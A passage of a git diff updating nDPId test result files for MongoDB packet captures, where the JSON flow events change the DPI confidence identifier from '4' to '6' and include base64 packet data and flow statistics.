+00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":10731,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593581425923} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 26/26 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 10731 bytes +~~ total detected protocols..: 0 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6005851 bytes +~~ total memory freed........: 6005851 bytes +~~ total allocations/frees...: 120902/120902 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 478 chars +~~ json string max len.......: 1744 chars +~~ json string avg len.......: 1073 chars diff --git a/test/results/mongodb.pcap.out b/test/results/mongodb.pcap.out index cd6ec9c5d..cd97c563e 100644 --- a/test/results/mongodb.pcap.out +++ b/test/results/mongodb.pcap.out 
@@ -4,36 +4,36 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1483558834969} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1483726705497} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":364,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1483737232974} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":633,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1483814916005} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 